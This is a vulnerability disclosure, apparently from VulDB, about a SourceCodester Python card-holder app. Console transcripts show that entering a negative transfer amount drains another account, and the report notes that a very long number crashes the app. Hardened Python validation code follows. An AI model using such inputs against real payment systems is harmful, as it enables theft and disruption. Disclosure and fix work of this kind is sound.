Submit #193110: Improper Input Sanitization leading to Arbitrary Money Transfer in Card Holder Management System

Title: Improper Input Sanitization leading to Arbitrary Money Transfer in Card Holder Management System
Description:

## Summary

An attacker can supply a negative number to the transfer field in Card Holder Management System version 1.0. This results in money being drained from the target account and added to the attacker's account.

## Risk Rating

- Risk: **HIGH**
- Exploitation Difficulty: **LOW**

## CVSS Justification

### Attack Vector: Network

The vulnerable component is bound to the network stack. The set of possible attackers extends beyond local attacks, up to and including the entire Internet. This kind of vulnerability is often termed "remotely exploitable" and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). This software is intended to be remotely accessible.

### Attack Complexity: Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

### Privileges Required: None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. This attack requires a user account, but there are no restrictions on account creation.

### User Interaction: None

The vulnerable system can be exploited without interaction from any user.

### Scope: Unchanged

An exploited vulnerability can only affect resources managed by the same security authority.

### Confidentiality: None

There is no loss of confidentiality within the impacted component.

### Integrity: High

The loss of data integrity poses a high threat to the component, and affects a core part of its service.

### Availability: Low

Performance is reduced or there are interruptions in resource availability. Supplying "99999999999999999999999999999999999999999999999999999" or other large numbers will crash the system. Additionally, the removal of money will impact the performance of the users.

## Steps to reproduce

Create two user accounts:

```
======== Card Holder Management System ========
1. Create New Account(Auto Generate)
2. User Account
0. Exit
Enter your choice: 1
Your card has been created
Your card number: 4000004512837604
Your card PIN: 7620
======== Card Holder Management System ========
1. Create New Account(Auto Generate)
2. User Account
0. Exit
Enter your choice: 1
Your card has been created
Your card number: 4000001250478633
Your card PIN: 5402
```

Log into account 1 and add $10000.

```
======== Card Holder Management System ========
1. Create New Account(Auto Generate)
2. User Account
0. Exit
Enter your choice: 1
Your card has been created
Your card number: 4000001250478633
Your card PIN: 5402
======== Card Holder Management System ========
1. Create New Account(Auto Generate)
2. User Account
0. Exit
Enter your choice: 2
Enter your card number: 4000004512837604
Enter your PIN: 7620
You have successfully logged in!
####### Card Holder Management System #######
1.Balance
2.Add Money
3.Transfer money
4.Close account
5.Log out
0.Exit
Enter your choice: 2
Enter Money: 10000
Money was added!
####### Card Holder Management System #######
1.Balance
2.Add Money
3.Transfer money
4.Close account
5.Log out
0.Exit
Enter your choice: 1
Balance: 10000
```

Log out of account 1, log into account 2, and initiate the malicious transfer.

```
####### Card Holder Management System #######
1.Balance
2.Add Money
3.Transfer money
4.Close account
5.Log out
0.Exit
Enter your choice: 5
You have successfully logged out!
======== Card Holder Management System ========
1. Create New Account(Auto Generate)
2. User Account
0. Exit
Enter your choice: 2
Enter your card number: 4000001250478633
Enter your PIN: 5402
You have successfully logged in!
####### Card Holder Management System #######
1.Balance
2.Add Money
3.Transfer money
4.Close account
5.Log out
0.Exit
Enter your choice: 3
Enter card number: 4000004512837604
Enter how much money you want to transfer: -10000
Success!
####### Card Holder Management System #######
1.Balance
2.Add Money
3.Transfer money
4.Close account
5.Log out
0.Exit
Enter your choice: 1
Balance: 10000
```

Log out of account 2 and log into account 1 to verify the funds are gone from account 1.

```
####### Card Holder Management System #######
1.Balance
2.Add Money
3.Transfer money
4.Close account
5.Log out
0.Exit
Enter your choice: 5
You have successfully logged out!
======== Card Holder Management System ========
1. Create New Account(Auto Generate)
2. User Account
0. Exit
Enter your choice: 2
Enter your card number: 4000004512837604
Enter your PIN: 7620
You have successfully logged in!
####### Card Holder Management System #######
1.Balance
2.Add Money
3.Transfer money
4.Close account
5.Log out
0.Exit
Enter your choice: 1
Balance: 0
```

## Affected Demographic/User Base

Users who rely on this system for their account management are at risk of funds being removed from their accounts without their knowledge.

## Recommended Fix

Add validation to the transfer amount.

## References

https://www.sourcecodester.com/python/16750/card-holder-management-system-python-free-source-code.html

## Notes

For the issued CVE ID, please credit Michael Blunt as the discovering researcher. List contact email as [email protected]. The author of this project has been contacted and this information has been shared.

## Impact

### Attack Scenario

An attacker can arbitrarily transfer funds out of an account and into their own by specifying a negative transfer amount.
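The recommended fix above says only to validate the transfer amount. As an added illustration, not code from the Card Holder Management System project, the following Python (the project's language) shows one hardened transfer routine. The in-memory ledger, the per-transfer limit and the function names (`parse_amount`, `transfer`, `attempt_transfer`) are assumptions made for this example; the card numbers are the sample values from the report. It addresses both failure modes the report names, the negative amount that reverses the direction of the transfer and the oversized number that crashes the application, and adds the balance check that a sign check alone does not give.

```python
from decimal import Decimal, InvalidOperation

# Constructed in-memory ledger standing in for the application's card store.
# Card numbers are the sample values from the report, not real cards.
SAMPLE_LEDGER = {
    "4000004512837604": Decimal("10000"),
    "4000001250478633": Decimal("0"),
}

# Policy limits; assumed values for this example, not from the original project.
MAX_TRANSFER = Decimal("1000000")  # largest single transfer accepted
MAX_INPUT_LEN = 16                 # reject very long strings before parsing them


class TransferError(ValueError):
    """Raised when a transfer request fails validation."""


def fresh_ledger():
    """Return a copy of the sample ledger so each scenario starts clean."""
    return dict(SAMPLE_LEDGER)


def parse_amount(raw: str) -> Decimal:
    """Turn user-supplied text into a positive, bounded, two-decimal amount.

    Rejects: empty or oversized strings, non-numeric text, NaN/Infinity,
    zero and negative values, values above MAX_TRANSFER, and sub-cent precision.
    """
    raw = raw.strip()
    if not raw or len(raw) > MAX_INPUT_LEN:
        raise TransferError("amount has invalid length")
    try:
        amount = Decimal(raw)
    except InvalidOperation as exc:
        raise TransferError("amount is not a number") from exc
    if not amount.is_finite():          # also rejects NaN and sNaN
        raise TransferError("amount must be a finite number")
    if amount <= 0:                     # the bug in the report: a negative value reverses the flow
        raise TransferError("amount must be positive")
    if amount > MAX_TRANSFER:           # the oversized values the report says crash the app
        raise TransferError("amount exceeds the per-transfer limit")
    if amount != amount.quantize(Decimal("0.01")):
        raise TransferError("amount has more than two decimal places")
    return amount


def transfer(ledger: dict, source: str, destination: str, raw_amount: str) -> Decimal:
    """Move funds from source to destination, validating every input first.

    The sign check in parse_amount and the balance check here are both needed:
    a negative amount would pull money out of the destination, and a positive
    amount larger than the balance would overdraw the source.
    """
    if source == destination:
        raise TransferError("cannot transfer to the same card")
    if source not in ledger or destination not in ledger:
        raise TransferError("unknown card number")
    amount = parse_amount(raw_amount)
    if ledger[source] < amount:
        raise TransferError("insufficient funds")
    # Apply the debit and credit only after every check has passed.
    ledger[source] -= amount
    ledger[destination] += amount
    return amount


def attempt_transfer(ledger: dict, source: str, destination: str, raw_amount: str):
    """Wrapper returning (succeeded, message) instead of raising, for callers and tests."""
    try:
        amount = transfer(ledger, source, destination, raw_amount)
    except TransferError as err:
        return False, str(err)
    return True, f"transferred {amount}"


if __name__ == "__main__":
    ledger = fresh_ledger()
    # Replay the report's scenario against the hardened routine: the second card
    # submits -10000 towards the first card; it is rejected and balances stay put.
    print(attempt_transfer(ledger, "4000001250478633", "4000004512837604", "-10000"))
    print(attempt_transfer(ledger, "4000001250478633", "4000004512837604", "9" * 53))
    print(attempt_transfer(ledger, "4000004512837604", "4000001250478633", "250.00"))
    print(ledger)
```

`Decimal` is used rather than `float` so that amounts like `250.00` are exact and so that string forms such as `NaN`, `Infinity` and exponent notation are caught explicitly instead of slipping through a `float()` call. The length cap runs before parsing so that an enormous digit string is refused without ever being converted.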
Source: https://www.sourcecodester.com/python/16750/card-holder-management-system-python-free-source-code.html
User: mikel22 (UID 51822)
Submission: 08/09/2023 18:46 (3 years ago)
Moderation: 08/20/2023 08:54 (11 days later)
Status: Accepted
VulDB entry: 237560 [SourceCodester Card Holder Management System 1.0 Minus Value improper validation of specified quantity in input]
Points: 20
